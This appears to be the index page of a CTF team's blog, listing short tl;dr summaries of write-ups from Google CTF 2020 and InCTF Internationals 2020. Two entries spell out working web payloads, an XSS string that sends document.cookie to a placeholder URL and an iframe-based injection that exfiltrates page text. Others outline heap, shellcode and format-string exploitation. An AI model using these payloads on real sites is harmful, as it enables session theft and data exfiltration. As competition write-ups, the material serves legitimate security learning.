bi0s

SafeHTMLPaste - Google CTF 2020

Az3z3l

2020-08-26

Web Exploitation

tl;dr

Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e

XQLi - InCTF Internationals 2020

Az3z3l

2020-08-26

Web Exploitation

tl;dr

SQLi - lcase('inKypinKy')id from dual
Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")

InCTFi XSS CSRF SQLi docker-ssrf

WriteOnly - Google CTF 2020

Cyb0rG

2020-08-24

Pwn / Sandbox

tl;dr

Execute shellcode on parent and write to child’s memory using /proc/<pid of child>/mem
Overwrite return address of child with execve shellcode and pop shell.

Shellcode Seccomp Write to child memory GoogleCTF

Secure Note - InCTF Internationals 2020

4lph4

2020-08-14

Misc

tl;dr

Challenge involves Reversing, Web, and Crypto
Reverse the binary to get the endpoints
Trigger the XSS bug in the website and get admin cookie
Use Hash Length extension attack to get authenticated as admin and get the flag

InCTFi Master Challenge

Invisible Maze- InCTF Internationals 2020

officialcjunior

2020-08-14

Misc

tl;dr

Challenge is a Nintendo GameBoy ROM image.
Reverse the ROM and figure out the implementation
Analyze the calling function’s checks to find the path along which we must move.

InCTFi Gameboy

MIX & MASH - InCTF Internationals 2020

v3ct0r

2020-08-14

Crypto

tl;dr

Extract higher bits of secret using input manipulation
Extract lower bits of secret using the highers bits and input manipulation

InCTFi

Reversing - InCTF Internationals 2020

4le31

2020-08-14

Reversing

A brief write-up detailing solutions of Reversing Challenges from InCTF Internationals 2020

InCTFi

P1ayground - InCTF Internationals 2020

leArner

2020-08-14

Reversing / Windows

A brief write-up of the intended solution of P1ayground challenge from InCTF Internationals 2020

tl;dr

Challenge is based on function hooking at runtime.
On reversing you will find 4 functions at the same address but executing different code(basically hooked at runtime).
Jump inside each function, reverse the algorithms to pass the checks.
Ignore the FAKE flag check.

InCTFi Windows Reversing APIhooking

Pwncry - InCTF Internationals 2020

rudyerudite

2020-08-09

Pwn / Linux / ELF

tl;dr

Passing corrupted ciphertext to get the symmetric key leak
Fastbin link corruption
Exploiting double free and UAF in the heap

InCTFi

Secret Service - InCTF Internationals 2020

Cyb0rG

2020-08-06

Pwn / Exploitation

tl;dr

Use format String to get into secret service.
Get libc leaks by overwriting mapped bit of a free chunk.
Overwrite the Thread Local Block , thus overwriting canary to get buffer overflow.

InCTFi Format String TCB overwrite Calloc Malefacerum